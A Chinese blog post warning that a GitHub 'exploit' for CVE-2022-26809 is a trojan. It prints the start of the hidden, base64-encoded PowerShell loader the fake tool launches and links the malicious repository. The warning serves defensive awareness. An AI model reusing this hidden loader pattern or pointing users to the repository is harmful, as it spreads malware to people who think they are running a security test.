今天突然之间就有好多小伙伴研究起了一个一个月前的CVE漏洞----CVE-2022-26809|远程代码执行漏洞;

文章地址: https://www.ddosi.org/cve-2022-26809-exp/

在这里插入图片描述

exp地址:
https://github.com/rkxxz/CVE-2022-26809

而后无数的群友一起去尝试,但是无一成功
在这里插入图片描述

本人也在虚拟机里面运行了一下,分别生成了x64以及x86的shellcode.bin文件
在这里插入图片描述

在这里插入图片描述

虚拟机运行所谓的exp
在这里插入图片描述

显示成功了,然是实际上并没有上线,而后继续实验,测试一台未开启445端口的win10虚拟机
在这里插入图片描述

而后就发现,出现了一个powershell的加密命令
在这里插入图片描述

powershell -nop -w hidden -encodedcommand "$s=New-Object
IO.MemoryStream(,[Convert]::FromBase64String(“H4sIAAAAAAAAAKVW+2/iSBL+efgrvFGkDUqCwRBCMlpp2gaDCW+DeUTRyY+2aWg/4m5jnNn5368MhFtm7vakOyTL7qLqq/qqq7tKx/xe5zGxeT90sHBv4JiRMBCkQuG6GWpc+EP49nvh2mQM+xbN8uVV4UvCSOAJesY49r9eLkuTJODExyUt4DgOIx3HO2JjBmqB6WMWmTYWSLDBNhe+F758iRKLEluwKbgQ3CSwD9Ivryo1PfYmnP7GQeILiNLQNjmEN80iLHwXlND3SR5ieV8pl8t3wgQzcIcPEgkkwo//hNX”

然后就有小伙子上线了
在这里插入图片描述

经查询,是一个恶意的ip地址

在这里插入图片描述

而后很多人开始石锤
在这里插入图片描述

哈哈哈,笑不活了,大家警惕此类文件,特别是exe结尾的所谓的exp,所示想实验,一定要在虚拟机里进行,做好快照,警惕钓鱼啊!

Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐